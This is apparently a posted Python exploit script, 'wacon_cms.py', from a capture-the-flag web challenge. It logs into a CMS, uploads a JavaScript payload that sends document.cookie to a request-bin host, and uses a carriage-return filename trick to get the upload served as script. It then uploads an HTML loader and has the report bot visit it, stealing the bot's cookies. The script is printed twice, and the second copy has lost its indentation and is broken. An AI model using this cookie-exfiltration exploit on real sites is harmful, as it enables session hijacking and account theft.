l0vey0u · September 3, 2023 13:55
diff --git a/wacon_cms.py b/wacon_cms.py
 import requests

 HOST = "https://9307-211-114-95-154.ngrok-free.app"
 HOST = "http://58.225.56.195"

 req_bin = "https://jsngigx.request.dreamhack.games"
 ex_src = f"location.replace('{req_bin}/?a='+document.cookie);"

 idx = int(input("마지막 글의 idx를 알려주세요"))

 with open("ex.html", "w") as f:
    f.write(ex_src)

 sess = requests.Session()

 data = {
    "username": "ghost",
    "pw": "ghost123"
 }
 resp = sess.post(f"{HOST}/login.php", data=data)
 print(sess.cookies.get_dict())
 print(resp.text)

 data = {
    'title': 'yey',
    'content': 'yey',
    'level': 1,
    'password': 'qwe123qwe'
 }
 headers = {
    "Cookie": f"PHPSESSID={sess.cookies.get_dict()['PHPSESSID']}"
 }
 files = {'file':('ex.html@', open('ex.html', 'rb'))}
 req = requests.Request('POST', f"{HOST}/board.php?p=write", data=data, files=files, headers=headers)
 req = req.prepare()
 req.body = req.body.replace(b"@", b"\r")
 print(req.body)
 print(req.headers)
 resp = sess.send(req)

 print(resp.content)



 load_src = f"""
 <html>
 <head>
 </head>
 <body>
 	<script src="http://webserver/download.php?idx={idx+1}"></script>
 </body>
 </html>
 """
 with open("load.html", "w") as f:
    f.write(load_src)

 data = {
    'title': 'yey',
    'content': 'yey',
    'level': 1,
    'password': 'qwe123qwe'
 }
 headers = {
    "Cookie": f"PHPSESSID={sess.cookies.get_dict()['PHPSESSID']}"
 }
 files = {'file':('load.html@', open('load.html', 'rb'))}
 req = requests.Request('POST', f"{HOST}/board.php?p=write", data=data, files=files, headers=headers)
 req = req.prepare()
 req.body = req.body.replace(b"@", b"\r")
 print(req.body)
 print(req.headers)
 resp = sess.send(req)

 print(resp.content)

 params = {
    "idx": idx + 2,
    "path": f"download.php"
 }
 resp = sess.get(f"{HOST}/report.php", params=params)
 print(resp.text)
	import requests

	HOST = "https://9307-211-114-95-154.ngrok-free.app"
	HOST = "http://58.225.56.195"

	req_bin = "https://jsngigx.request.dreamhack.games"
	ex_src = f"location.replace('{req_bin}/?a='+document.cookie);"

	idx = int(input("마지막 글의 idx를 알려주세요"))

	with open("ex.html", "w") as f:
	f.write(ex_src)

	sess = requests.Session()

	data = {
	"username": "ghost",
	"pw": "ghost123"
	}
	resp = sess.post(f"{HOST}/login.php", data=data)
	print(sess.cookies.get_dict())
	print(resp.text)

	data = {
	'title': 'yey',
	'content': 'yey',
	'level': 1,
	'password': 'qwe123qwe'
	}
	headers = {
	"Cookie": f"PHPSESSID={sess.cookies.get_dict()['PHPSESSID']}"
	}
	files = {'file':('ex.html@', open('ex.html', 'rb'))}
	req = requests.Request('POST', f"{HOST}/board.php?p=write", data=data, files=files, headers=headers)
	req = req.prepare()
	req.body = req.body.replace(b"@", b"\r")
	print(req.body)
	print(req.headers)
	resp = sess.send(req)

	print(resp.content)



	load_src = f"""
	<html>
	<head>
	</head>
	<body>
	<script src="http://webserver/download.php?idx={idx+1}"></script>
	</body>
	</html>
	"""
	with open("load.html", "w") as f:
	f.write(load_src)

	data = {
	'title': 'yey',
	'content': 'yey',
	'level': 1,
	'password': 'qwe123qwe'
	}
	headers = {
	"Cookie": f"PHPSESSID={sess.cookies.get_dict()['PHPSESSID']}"
	}
	files = {'file':('load.html@', open('load.html', 'rb'))}
	req = requests.Request('POST', f"{HOST}/board.php?p=write", data=data, files=files, headers=headers)
	req = req.prepare()
	req.body = req.body.replace(b"@", b"\r")
	print(req.body)
	print(req.headers)
	resp = sess.send(req)

	print(resp.content)

	params = {
	"idx": idx + 2,
	"path": f"download.php"
	}
	resp = sess.get(f"{HOST}/report.php", params=params)
	print(resp.text)